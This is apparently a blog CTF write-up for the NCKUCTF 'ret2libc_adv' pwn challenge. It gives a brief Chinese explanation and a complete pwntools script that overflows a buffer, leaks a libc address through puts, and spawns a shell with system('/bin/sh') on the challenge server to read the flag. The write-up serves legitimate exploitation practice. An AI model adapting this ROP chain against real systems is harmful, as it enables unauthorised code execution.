NCKUCTF ret2libc_adv WriteUp

Chihhh Linnn 香菇頭
  2024-08-11 21:55:38 2024-08-11 21:55:38 Created   2024-08-11 21:55:38 2024-08-11 21:55:38 Updated    

ret2libc_adv

b'a'*0x28 overflow 後,把 leak 的chain 寫入,然後寫回main後使用libc中的東西
這題因為 lazy bindding 所以我們不能使用printf它來leak base address

Exploitation

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
from pwn import *

context.arch = 'amd64'

# r = process('./chal')
l = ELF("/root/pwn/ctf/libc.so.6")
r= remote('chall.nckuctf.org', 10010)

# overflow with 0x28
pop_rdi = 0x401463
print_got = 0x404018
puts_plt = 0x4010a0
main = 0x4011f6
ret = 0x40101a
leave_ret = 0x4013f1

p = flat(
    b'a'*0x28,
    ret,
    pop_rdi,
    print_got,
    puts_plt,
    ret,
    main
)

r.sendlineafter(b'Exit\n',b'3')
r.sendlineafter(b'go!\n',p)

l.address = u64(r.recv(6).ljust(8, b"\0")) - 0x80e50
success("base address -> %s" % hex(l.address)) 


print(hex(next(l.search("/bin/sh\0"))))
p2 = flat(b"a" * 0x28, pop_rdi, next(l.search("/bin/sh\0")), ret, l.sym.system)


r.sendlineafter(b'Exit\n',b'3')
r.sendlineafter(b'go!\n',p2)

r.sendline(b'cat /home/$(whoami)/flag*')

r.interactive()
  • Title: NCKUCTF ret2libc_adv WriteUp
  • Author: Chihhh Linnn
  • Created at : 2024-08-11 21:55:38
  • Updated at : 2024-08-11 21:55:38
  • Link: https://chihhhs.github.io/2024/08/11/ncku/
  • License: This work is licensed under CC BY-NC-SA 4.0.
推薦閱讀
ROP3-WriteUp ROP3-WriteUp NCKUCTF ret2libc2024 WriteUp NCKUCTF ret2libc2024 WriteUp Stack Pivoting WriteUp Stack Pivoting WriteUp
推薦閱讀
ROP3-WriteUp ROP3-WriteUp NCKUCTF ret2libc2024 WriteUp NCKUCTF ret2libc2024 WriteUp
On this page
NCKUCTF ret2libc_adv WriteUp
  1. ret2libc_adv
    1. Exploitation